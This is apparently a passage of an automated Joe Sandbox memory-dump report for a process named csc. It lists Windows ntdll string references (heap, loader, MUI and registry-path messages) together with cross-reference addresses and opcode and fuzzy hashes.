                                                      • RTL: Re-Waiting, xrefs: 0541031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054102BD
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 053C5247
                                                      • Kernel-MUI-Language-SKU, xrefs: 053C542B
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 053C5352
                                                      • WindowsExcludedProcs, xrefs: 053C522A
                                                      • Kernel-MUI-Language-Allowed, xrefs: 053C527B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: ec82d90f90a7b8df020f4cfb71a60661a698859dcfb37c865340686052a996d3
                                                      • Instruction ID: 3dade955ca0a10afb84e2077a50b99c33f464e82dd1da98c0ff95aef58572dd4
                                                      • Opcode Fuzzy Hash: ec82d90f90a7b8df020f4cfb71a60661a698859dcfb37c865340686052a996d3
                                                      • Instruction Fuzzy Hash: F613AF70A04215DFEB25CF68C490BE9FBB6FF48304F148199D94AABB81D7B4A945CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-3570731704
                                                      • Opcode ID: 8be90a0d3321ac2c4bec08604a66504696017c20789b6b5d3319012041b8e6d8
                                                      • Instruction ID: b3e63a41e492c801633a2f26745146450a11d330fe4c4dd53e75ac48c8957001
                                                      • Opcode Fuzzy Hash: 8be90a0d3321ac2c4bec08604a66504696017c20789b6b5d3319012041b8e6d8
                                                      • Instruction Fuzzy Hash: DC923771A04229CFEB24CB18C855FEAB7B6BF45310F1581EAE949A7790D7B09E80CF51
                                                      Strings
                                                      • @, xrefs: 053D8591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053D8421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 053D855E
                                                      • LdrpInitializeProcess, xrefs: 053D8422
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 002bc675c512c40847a8777affad1c299b16e3b69152f274f05637b114db23fe
                                                      • Instruction ID: 0313df2ae2ecb3d540165b73ec4525246b8b1927037139c4026d9dac75bfc896
                                                      • Opcode Fuzzy Hash: 002bc675c512c40847a8777affad1c299b16e3b69152f274f05637b114db23fe
                                                      • Instruction Fuzzy Hash: B9918E72A08345AFD722DF60D855EEBF6EDBF84784F40092EFA8496150E774E904CB62
                                                      Strings
                                                      • .Local, xrefs: 053D28D8
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 054121D9, 054122B1
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 054122B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 054121DE
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 878d099125c7a5385396a438f85d09bdd727eafb1ffd3c807d231f3d23ec31bf
                                                      • Instruction ID: 70fdb4a35b2e65db03d5b377f28faa84e101f21cf1401ebb7c29cc6019b48916
                                                      • Opcode Fuzzy Hash: 878d099125c7a5385396a438f85d09bdd727eafb1ffd3c807d231f3d23ec31bf
                                                      • Instruction Fuzzy Hash: 6CA1B53A905229DBCB25CF55D884BEAB3B5BF58314F1401EAE809AB351D7709E81CFA4
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 054010AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05400FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05401028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0540106B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: b7e8a11dc76834e0d245a52a8a68340106a40e25b78953866d6f589b260009f4
                                                      • Instruction ID: e229607a0a20d4715c724af7561955e38d8ee1a5b962b818c9ae6548924836b9
                                                      • Opcode Fuzzy Hash: b7e8a11dc76834e0d245a52a8a68340106a40e25b78953866d6f589b260009f4
                                                      • Instruction Fuzzy Hash: F67113B2A04314AFCB20EF14C889F977FA9EF44764F540469F9488B286D374D588CBD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      • API String ID: 0-2586055223
                                                      • Opcode ID: 4f90471d8aeb91968d9c985cd980297b1a17aee2b3727b52fc75e5acacaf6152
                                                      • Instruction ID: a2e53e6f256bf2a9ab6a92c28894a73fb1fce094628a0b54110952a003ff85d5
                                                      • Opcode Fuzzy Hash: 4f90471d8aeb91968d9c985cd980297b1a17aee2b3727b52fc75e5acacaf6152
                                                      • Instruction Fuzzy Hash: FC610372208381AFDB22DB68C848F67B7E9FF80714F040869FA55CB6A1C774D805D761
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      • API String ID: 0-336120773
                                                      • Opcode ID: 654eb0c69b77b3320b3f1737f926a80a776523bdc259d7e71205fd96a09f592e
                                                      • Instruction ID: 7e366b5d74e7253e20cc9549d236ae6933bfac46f7de19a081da197496ffdd9c
                                                      • Opcode Fuzzy Hash: 654eb0c69b77b3320b3f1737f926a80a776523bdc259d7e71205fd96a09f592e
                                                      • Instruction Fuzzy Hash: C4311432614115EFDB28DB98C885FA7B3E9FF04A70F540196F882EB292D670AC40CA65
                                                      Strings
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0540A992
                                                      • apphelp.dll, xrefs: 053C2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0540A9A2
                                                      • LdrpDynamicShimModule, xrefs: 0540A998
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 5178173898f06cb725c96aa098f86a77a1ac88ec4b3b6cbde5d4ea7a43986bcc
                                                      • Instruction ID: ba2b369db21c13ff03d4d42b1be2f2531b3f5fa409515ccb5159d308c794eede
                                                      • Opcode Fuzzy Hash: 5178173898f06cb725c96aa098f86a77a1ac88ec4b3b6cbde5d4ea7a43986bcc
                                                      • Instruction Fuzzy Hash: 0831E976750301ABDB28DF5A9947EFB7BB5FB84B04F2644AEF80167290CB705941CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      • API String ID: 0-1391187441
                                                      • Opcode ID: 144364b1d0f7c73af6b0f198430da6b8918226fc81f461ed2c0844b78174a1a9
                                                      • Instruction ID: 7c7543f7d4c365c45fed553adb7de5dd43e6244c85045c3724a078a36d348576
                                                      • Opcode Fuzzy Hash: 144364b1d0f7c73af6b0f198430da6b8918226fc81f461ed2c0844b78174a1a9
                                                      • Instruction Fuzzy Hash: F031B0B2A10209EFCF15DB49C899FAAF7F9FF45A20F144055E915AB290D7B0ED40CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $0
                                                      • API String ID: 0-3352262554
                                                      • Opcode ID: 4170fab9c7be8308ca8bb21379c1055d6fe65d472155c454bc41dfb2b998634c
                                                      • Instruction ID: 128ccf9317eff47327a02e82b6efca108432cf978b26a7d4916e021a38700fb8
                                                      • Opcode Fuzzy Hash: 4170fab9c7be8308ca8bb21379c1055d6fe65d472155c454bc41dfb2b998634c
                                                      • Instruction Fuzzy Hash: A53213B16483818FE320CF68C484BABBBE5BB88344F04492EF59987350D775E949DF52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: cc07c11581753075d3e9ff920583d882b50c4ed87dfe5def09129a51bc34dd9e
                                                      • Instruction ID: 5e5693c23ca63607b804f22d8aacd59c967824a4ce6cf67e073e51b425273cfa
                                                      • Opcode Fuzzy Hash: cc07c11581753075d3e9ff920583d882b50c4ed87dfe5def09129a51bc34dd9e
                                                      • Instruction Fuzzy Hash: A4F17A70B00605DFEB19CF68C898BEAB7B6FF44300F2481A9E5169BB91D774A941CF91
                                                      Strings
                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 053A1728
                                                      • HEAP: , xrefs: 053A1596
                                                      • HEAP[%wZ]: , xrefs: 053A1712
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: d66b12b3f5fec6bbe1b69e4170254a0722b95624364157b684aeccde635059a2
                                                      • Instruction ID: 4f1f01ed7c6a68e15a38f33091a61110f6ff4ae034b13f432bf3b2c32262967a
                                                      • Opcode Fuzzy Hash: d66b12b3f5fec6bbe1b69e4170254a0722b95624364157b684aeccde635059a2
                                                      • Instruction Fuzzy Hash: 77E10272A042459FDB29CF28C495BBABBF6FF88300F18845DE996CB685D774E844CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                      • API String ID: 0-1145731471
                                                      • Opcode ID: 9892ba10e1b7e1409d4e1264f46ef26fd8bdce5ed175394d221e9448fdf30b46
                                                      • Instruction ID: 48f7ebd8f61888d7060c9bd03889a2505ce7b5f62a287b75bc3bf6f0fcd64f80
                                                      • Opcode Fuzzy Hash: 9892ba10e1b7e1409d4e1264f46ef26fd8bdce5ed175394d221e9448fdf30b46
                                                      • Instruction Fuzzy Hash: 73B19F33A086549BDB25CF59C990BAEBBF6FF44314F28496AE852DB780E774D840CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      • API String ID: 0-2391371766
                                                      • Opcode ID: eae1d984cb69cdf31615f4eebd9a58ccd194c181f3933f8ff015421df7afd9ad
                                                      • Instruction ID: 86f88c4c6514cc5eab2220595a42289a2e2cd322b6badd04d93ed1eecd6967b6
                                                      • Opcode Fuzzy Hash: eae1d984cb69cdf31615f4eebd9a58ccd194c181f3933f8ff015421df7afd9ad
                                                      • Instruction Fuzzy Hash: E3B1AC72618365AFE721DF54C885FABB7F8BB44750F414D2AFA419B280D778E804CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 6d7b67c686c705bea27427f5aacecfe34ac276bdad8b537b1b2c6e007b415725
                                                      • Instruction ID: ee2cbfe1d10cbec962637654566fbfc484b43209f95a610df43f0dffd8b99cfd
                                                      • Opcode Fuzzy Hash: 6d7b67c686c705bea27427f5aacecfe34ac276bdad8b537b1b2c6e007b415725
                                                      • Instruction Fuzzy Hash: 33A1677594522D9BDB359B64CC88BEAB7B8FF44700F1001EAEA09A7250D7759E84CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      • API String ID: 0-318774311
                                                      • Opcode ID: 88b391f4d1174f76162ee2c779497472431159a7040da1c2e752a170e2053dab
                                                      • Instruction ID: 33c5c825ff7a94d87f5875784b8625644b06c5e4acf97679329a3cbcd6d2b36a
                                                      • Opcode Fuzzy Hash: 88b391f4d1174f76162ee2c779497472431159a7040da1c2e752a170e2053dab
                                                      • Instruction Fuzzy Hash: A7818971608340ABE315DF14C846BABBBE9BF88750F044D6AB9819B3A0E774D904CB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                      • API String ID: 0-373624363
                                                      • Opcode ID: 22289352d4adcb1c174e3d176a2c64e12f3359b79dd518cd62920143c84fbb4c
                                                      • Instruction ID: 3c36ecda3fe222f194a63e2b4c894b74196f80eba1e51b830219166d693f0f7e
                                                      • Opcode Fuzzy Hash: 22289352d4adcb1c174e3d176a2c64e12f3359b79dd518cd62920143c84fbb4c
                                                      • Instruction Fuzzy Hash: 2A91C172A08219CFDB25CF58C464BEEB7B5FF41314F24859AE852AB3D0D7B89940CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      • API String ID: 0-1537733988
                                                      • Opcode ID: 5b554f783e060a3f7b6ab57bd7fe5918d0731c0d6d3d5f93419a5c28e90f6ca2
                                                      • Instruction ID: f4be9dd38ca10155c241186153320f9dcdbb085a0e793a6cff9465189fbc931f
                                                      • Opcode Fuzzy Hash: 5b554f783e060a3f7b6ab57bd7fe5918d0731c0d6d3d5f93419a5c28e90f6ca2
                                                      • Instruction Fuzzy Hash: C471AE726093059FC714DF20D984BABFBFABFC4618F108A1EE89A47651D730D905CBA6
                                                      Strings
                                                      • TargetNtPath, xrefs: 0547B82F
                                                      • GlobalizationUserSettings, xrefs: 0547B834
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0547B82A
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      • API String ID: 0-505981995
                                                      • Opcode ID: dc4e7d68b08b49a057827e70c4bdb1157ec4e7f7e87c6be03d1e53926058b4d6
                                                      • Instruction ID: b85fccef100ee13ff550df30a388068657e71557aca6819c00f3f0a8d0d31165
                                                      • Opcode Fuzzy Hash: dc4e7d68b08b49a057827e70c4bdb1157ec4e7f7e87c6be03d1e53926058b4d6
                                                      • Instruction Fuzzy Hash: 63613E7294162DABDB31DB54DC88BDAB7B9EF14710F0101EAE509AB250EB74DE84CF90
                                                      Strings
                                                      • HEAP: , xrefs: 053FE6B3
                                                      • HEAP[%wZ]: , xrefs: 053FE6A6
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 053FE6C6
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      • API String ID: 0-1340214556
                                                      • Opcode ID: 5f8a2b775f5b462650701be44b9e4be21c28263a99160eb0897e71103a40a497
                                                      • Instruction ID: bfa306b7b936b3b3729e63eb26a2b17e564eaa063401986d162105d8a413a150
                                                      • Opcode Fuzzy Hash: 5f8a2b775f5b462650701be44b9e4be21c28263a99160eb0897e71103a40a497
                                                      • Instruction Fuzzy Hash: 2B51E371708644AFEB27DBA8C888FA6BBF9FF05700F0404A5E641CB692D7B4E940DB10
                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0540A589
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0540A59A
                                                      • LdrpCompleteMapModule, xrefs: 0540A590
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 054182D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 054182DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 054182E8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                      • API String ID: 0-1151232445
                                                      Strings
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05411B4A
                                                      • LdrpAllocateTls, xrefs: 05411B40
                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05411B39
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-4274184382
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0545C212
                                                      • @, xrefs: 0545C1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0545C1C5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05424899
                                                      • LdrpCheckRedirection, xrefs: 0542488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05424888
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      Strings
                                                      • GlobalFlag, xrefs: 0542B68F
                                                      • @, xrefs: 0542B670
                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0542B632
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                      • API String ID: 0-4192008846
                                                      Strings
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05411A51
                                                      • LdrpInitializeTls, xrefs: 05411A47
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 05411A40
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      Strings
                                                      • Process initialization failed with status 0x%08lx, xrefs: 054220F3
                                                      • LdrpInitializationFailure, xrefs: 054220FA
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05422104
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$
                                                      • API String ID: 0-233714265
                                                      Strings
                                                      • kLsE, xrefs: 053A0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 053A063D
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                      • API String ID: 0-118005554
                                                      Strings
                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 05412A90
                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05412A95
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                      • API String ID: 0-2653619699
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction ID: 7549fae063e5044a6ee31a0e97495c6b934f34e806b5b50c81ca4479567a9f84
                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction Fuzzy Hash: D451BD72608725BFE7219F54C845FABB7F8FB84750F80092AB64097690E7B0ED08CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: 8e81655c466ba91d3073fd4dbb096f2397138e5b2dfbca3bace6c1617b5520a9
                                                      • Instruction ID: b39dbf8e18c6b705afd96423f119e4d4ebbcddae229f790c8a8f0d21af6915b3
                                                      • Opcode Fuzzy Hash: 8e81655c466ba91d3073fd4dbb096f2397138e5b2dfbca3bace6c1617b5520a9
                                                      • Instruction Fuzzy Hash: 0841A372608351ABE720DA79C845BEBB7ECAF88704F440A2DF685D7580E7B4D904D793
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
